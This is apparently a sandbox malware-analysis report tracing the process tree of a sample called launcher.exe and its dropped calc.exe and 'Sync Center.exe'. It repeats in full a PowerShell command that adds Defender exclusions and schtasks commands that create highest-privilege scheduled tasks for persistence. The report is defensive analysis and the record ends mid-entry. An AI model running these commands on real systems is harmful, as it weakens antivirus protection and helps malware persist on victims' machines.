PID 548 wrote to memory of 2076	548	calc.exe	cmd.exe
PID 548 wrote to memory of 2076	548	calc.exe	cmd.exe
PID 2076 wrote to memory of 1680	2076	cmd.exe	schtasks.exe
PID 2076 wrote to memory of 1680	2076	cmd.exe	schtasks.exe
PID 5004 wrote to memory of 1860	5004	cmd.exe	schtasks.exe
PID 5004 wrote to memory of 1860	5004	cmd.exe	schtasks.exe
PID 3908 wrote to memory of 3020	3908	launcher.exe	calc.exe
PID 3908 wrote to memory of 3020	3908	launcher.exe	calc.exe
PID 3908 wrote to memory of 1696	3908	launcher.exe	powershell.exe
PID 3908 wrote to memory of 1696	3908	launcher.exe	powershell.exe
PID 3908 wrote to memory of 4584	3908	launcher.exe	Sync Center.exe
PID 3908 wrote to memory of 4584	3908	launcher.exe	Sync Center.exe
PID 2408 wrote to memory of 1708	2408	launcher.exe	powershell.exe
PID 2408 wrote to memory of 1708	2408	launcher.exe	powershell.exe
PID 3020 wrote to memory of 552	3020	calc.exe	cmd.exe
PID 3020 wrote to memory of 552	3020	calc.exe	cmd.exe
PID 3020 wrote to memory of 1816	3020	calc.exe	cmd.exe
PID 3020 wrote to memory of 1816	3020	calc.exe	cmd.exe
PID 2408 wrote to memory of 2204	2408	launcher.exe	launcher.exe
PID 2408 wrote to memory of 2204	2408	launcher.exe	launcher.exe
PID 2408 wrote to memory of 1656	2408	launcher.exe	powershell.exe
PID 2408 wrote to memory of 1656	2408	launcher.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3452

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
4⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
5⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
5⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
6⤵
- Checks computer location settings
- Loads dropped DLL
PID:4996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
7⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4516

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
7⤵
- Checks computer location settings
- Loads dropped DLL
PID:1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
8⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4492

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
8⤵
- Checks computer location settings
- Loads dropped DLL
PID:2948

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5044

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
9⤵
- Checks computer location settings
PID:3020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2940

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
10⤵
- Checks computer location settings
PID:2524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
11⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
11⤵
- Checks computer location settings
PID:2824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4072

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
12⤵
- Checks computer location settings
PID:1248

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
13⤵
- Checks computer location settings
PID:4516

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
14⤵
- Suspicious use of AdjustPrivilegeToken
PID:4564

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
14⤵
- Checks computer location settings
PID:1284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
15⤵
- Command and Scripting Interpreter: PowerShell
PID:2780

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
15⤵
- Checks computer location settings
PID:4744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
16⤵
PID:4728

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
16⤵
- Checks computer location settings
PID:2780

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
17⤵
PID:4672

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
17⤵
- Checks computer location settings
PID:1492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
18⤵
PID:832

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
18⤵
- Checks computer location settings
PID:4728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
19⤵
PID:3832

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
19⤵
- Checks computer location settings
PID:4800

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
20⤵
PID:2900

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
20⤵
- Checks computer location settings
PID:3272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
21⤵
PID:1884

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
21⤵
- Checks computer location settings
PID:4472

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
22⤵
PID:5088

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
22⤵
- Checks computer location settings
PID:4692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
23⤵
PID:1060

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
23⤵
- Checks computer location settings
PID:5212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
24⤵
PID:5572

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
25⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
24⤵
- Checks computer location settings
PID:5480

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
25⤵
PID:4184

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
25⤵
- Checks computer location settings
PID:3016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
26⤵
- Command and Scripting Interpreter: PowerShell
PID:2512

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
26⤵
- Checks computer location settings
PID:1644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
27⤵
- Command and Scripting Interpreter: PowerShell
PID:2824

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
27⤵
- Checks computer location settings
PID:5424

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
28⤵
- Command and Scripting Interpreter: PowerShell
PID:1608

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
28⤵
- Checks computer location settings
PID:5208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
29⤵
- Command and Scripting Interpreter: PowerShell
PID:5244

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
30⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
29⤵
- Checks computer location settings
PID:5956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
30⤵
PID:3128

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
30⤵
- Checks computer location settings
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
31⤵
- Command and Scripting Interpreter: PowerShell
PID:5892

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
31⤵
- Checks computer location settings
PID:4708

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
32⤵
- Command and Scripting Interpreter: PowerShell
PID:1132

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
32⤵
- Checks computer location settings
PID:2204

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
33⤵
- Command and Scripting Interpreter: PowerShell
PID:5560

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
33⤵
- Checks computer location settings
PID:2672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
34⤵
- Command and Scripting Interpreter: PowerShell
PID:1112

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
34⤵
- Checks computer location settings
PID:4528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
35⤵
- Command and Scripting Interpreter: PowerShell
PID:5724

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
35⤵
- Checks computer location settings
PID:5268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
36⤵
PID:3572

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
36⤵
- Checks computer location settings
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
37⤵
PID:5236

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
37⤵
- Checks computer location settings
PID:4596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
38⤵
- Command and Scripting Interpreter: PowerShell
PID:4324

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
38⤵
- Checks computer location settings
PID:2300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
39⤵
PID:5044

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
39⤵
- Checks computer location settings
PID:4660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
40⤵
- Command and Scripting Interpreter: PowerShell
PID:5584

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
40⤵
- Checks computer location settings
PID:968

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
41⤵
- Command and Scripting Interpreter: PowerShell
PID:3916

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
41⤵
PID:5928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
42⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
42⤵
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
43⤵
- Command and Scripting Interpreter: PowerShell
PID:3664

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
43⤵
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
44⤵
- Command and Scripting Interpreter: PowerShell
PID:1940

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
44⤵
PID:6196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
45⤵
- Command and Scripting Interpreter: PowerShell
PID:7064

C:\Users\Admin\AppData\Local\Temp\launcher.exe
"C:\Users\Admin\AppData\Local\Temp\launcher.exe"
45⤵
PID:2996

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
45⤵
- Command and Scripting Interpreter: PowerShell
PID:2168

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
44⤵
PID:6212

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
44⤵
PID:6540

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
44⤵
PID:6560

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
44⤵
PID:6768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
43⤵
PID:5908

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
43⤵
PID:1996

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
44⤵
PID:6352

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
45⤵
- Scheduled Task/Job: Scheduled Task
PID:6452

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
44⤵
PID:6360

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
45⤵
- Scheduled Task/Job: Scheduled Task
PID:6460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
43⤵
- Command and Scripting Interpreter: PowerShell
PID:1416

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
43⤵
PID:5952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
42⤵
- Command and Scripting Interpreter: PowerShell
PID:5944

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
42⤵
PID:6112

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
43⤵
PID:5044

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
44⤵
PID:4672

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
43⤵
PID:4920

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
44⤵
PID:2976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
42⤵
- Command and Scripting Interpreter: PowerShell
PID:5672

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
42⤵
PID:536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
41⤵
- Command and Scripting Interpreter: PowerShell
PID:1228

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
41⤵
PID:4268

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
42⤵
PID:6108

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
43⤵
PID:3916

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
43⤵
PID:5540

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
42⤵
PID:2996

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
43⤵
PID:5484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
41⤵
- Command and Scripting Interpreter: PowerShell
PID:1408

C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
"C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
41⤵
PID:1764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calc.exe'
40⤵
PID:3032

C:\Users\Admin\AppData\Local\Temp\calc.exe
"C:\Users\Admin\AppData\Local\Temp\calc.exe"
40⤵
PID:4748

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
41⤵
PID:3672

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
42⤵
PID:5952

C:\Windows\SYSTEM32\cmd.exe
